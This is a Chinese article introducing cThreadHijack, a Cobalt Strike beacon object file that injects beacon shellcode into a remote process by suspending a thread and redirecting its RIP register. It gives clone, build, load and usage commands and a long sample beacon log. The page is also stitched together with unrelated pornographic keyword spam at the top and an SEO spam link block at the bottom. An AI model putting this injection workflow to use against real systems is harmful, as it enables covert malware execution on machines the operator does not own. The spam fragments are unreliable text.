成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

如何使用cThreadHijack實現遠程進程注入研究

安全 網站安全
cThreadHijack是一個針對遠程進程注入信標對象文件(BOF),該工具主要通過線程劫持技術實現其功能,并且不會生成任何遠程線程。

[[423622]]

關于cThreadHijack

cThreadHijack是一個針對遠程進程注入信標對象文件(BOF),該工具主要通過線程劫持技術實現其功能,并且不會生成任何遠程線程。

運行機制

cThreadHijack可以根據用戶提供的監聽器參數來生成原始信標Shellcode,并根據用戶提供的PID參數將其注入至遠程進程中,這一步主要利用的是VirtualAllocEx和WriteProcessMemory方法。

接下來,cThreadHijack并不會通過CreateRemoteThread或其他API生成一個新的遠程線程,而是識別目標進程中的第一個線程,掛起目標線程之后,它便會通過一個CONTEXT結構體來獲取線程CPU狀態的內容。接下來,它會修改CONTEXT結構體中RIP寄存器成員的地址,并將其指向遠程Payload。

在執行之前,cThreadHijack會將一個封裝了信標Shellcode的程序添加至一個針對CreateThread的調用方法中。CreateThread程序封裝在一個名叫NtContinue的函數調用程序,可以允許之前被劫持的線程在不導致遠程進程崩潰的前提下恢復運行。cThreadHijack的信標Payload在生成時會帶有一個“線程退出函數”,以允許進程在信標退出之后繼續執行。

信標監聽器的名稱如果包含空格的話,必須放在引號中。

工具下載

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

  1. git clone https://github.com/connormcgarr/cThreadHijack.git 

項目構建

首先,在一臺Windows虛擬機上,點擊Win鍵,輸入“x64 Native Tools”打開“x64 Native Tools Command Prompt for VS”對話框。

接下來,將目錄修改為“C:\path\to\cThreadHijack”。

然后運行下列命令:

  1. nmake -f Makefile.msvc build 

最后,通過Cobalt Strike的“Script Console”以及參數“load /path/to/cThreadHijack.cna”來加載cThreadHijack.cna。

工具使用

  1. cThreadHijack PID LISTENER_NAME 

運行結果樣例如下:

  1. beacon> cThreadHijack 7340 TESTING 
  2.  
  3. [+] host called home, sent: 268433 bytes 
  4.  
  5. [+] received output: 
  6.  
  7. [+] Target process PID: 7340 
  8.  
  9.   
  10.  
  11. [+] received output: 
  12.  
  13. [+] Opened a handle to PID 7340 
  14.  
  15.   
  16.  
  17. [+] received output: 
  18.  
  19. [+] Found a thread in the target process! Thread ID: 10212 
  20.  
  21.   
  22.  
  23. [+] received output: 
  24.  
  25. [+] Suspending the targeted thread... 
  26.  
  27.   
  28.  
  29. [+] received output: 
  30.  
  31. [+] Wrote Beacon shellcode to the remote process! 
  32.  
  33.   
  34.  
  35. [+] received output: 
  36.  
  37. [+] Virtual memory for CreateThread and NtContinue routines allocated at 0x201f4ab0000 inside of the remote process! 
  38.  
  39.   
  40.  
  41. [+] received output: 
  42.  
  43. [+] Size of NtContinue routine: 64 bytes 
  44.  
  45. [+] Size of CONTEXT structure: 1232 bytes 
  46.  
  47. [+] Size of stack alignment routine: 4 
  48.  
  49. [+] Size of CreateThread routine: 64 
  50.  
  51. [+] Size of shellcode: 261632 bytes 
  52.  
  53.   
  54.  
  55. [+] received output: 
  56.  
  57. [+] Wrote payload to buffer to previously allocated buffer inside of! 
  58.  
  59.   
  60.  
  61. [+] received output: 
  62.  
  63. [+] Current RIP: 0x7ffa55df69a4 
  64.  
  65.   
  66.  
  67. [+] received output: 
  68.  
  69. [+] Successfully pointed the target thread's RIP register to the shellcode! 
  70.  
  71.   
  72.  
  73. [+] received output: 
  74.  
  75. [+] Current RIP: 0x201f4ab0000 
  76.  
  77.   
  78.  
  79. [+] received output: 
  80.  
  81. [+] Resuming the thread! Please wait a few moments for the Beacon payload to execute... 

項目地址

cThreadHijack:【GitHub傳送門

 

責任編輯:趙寧寧 來源: FreeBuf
相關推薦

2021-07-28 09:53:53

FalconEye注入安全檢測

2021-09-13 09:21:51

InjectorWindows內存注入

2017-08-16 16:00:05

PHPcontainer依賴注入

2011-08-23 13:37:47

2014-04-01 11:17:16

2021-09-13 06:33:27

遠程工作ITCIO

2009-09-02 15:08:47

2020-11-04 07:17:42

Nodejs通信進程

2018-03-12 10:02:30

PHP依賴注入

2023-09-18 14:41:56

2010-09-26 13:56:43

SQL遠程查詢

2024-05-31 08:45:24

2013-03-28 13:14:45

AIDL進程間通信Android使用AI

2018-02-28 14:04:08

RMIJDBC存儲

2013-08-16 09:34:40

2013-08-15 16:24:13

2013-01-30 15:07:59

Shell

2015-07-23 10:51:28

2017-02-13 10:00:39

Windows遠程桌面

2018-07-24 09:57:02

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 国产999精品久久久久久绿帽 | 99爱在线视频 | 91亚洲国产成人精品一区二三 | 99福利 | 日韩欧美精品一区 | 国产成在线观看免费视频 | 亚洲一区二区三区视频在线 | 国产在线播放一区二区三区 | 久草综合在线 | 欧美在线网站 | 超碰精品在线 | 午夜免费网站 | 中文字幕中文字幕 | 日本三级网址 | 天天草天天爱 | 久久精品国产99国产精品亚洲 | 一级免费看 | 欧美国产精品一区二区三区 | 特黄色毛片 | 中文字幕精品一区二区三区精品 | 三级成人在线观看 | 久久天堂网 | 噜噜噜噜狠狠狠7777视频 | 成人精品一区亚洲午夜久久久 | 五月激情综合网 | 四虎最新视频 | 特级毛片www| 国产精品欧美一区二区三区不卡 | 国产综合久久久久久鬼色 | 久久久久国产精品 | 亚洲午夜精品视频 | 亚洲av一级毛片 | av中文字幕网 | 国产精品a级 | 国产精品视频在线播放 | 成人免费看黄 | 欧美九九九 | 一区二区三区免费 | 午夜影院黄 | 久久免费精彩视频 | 激情91|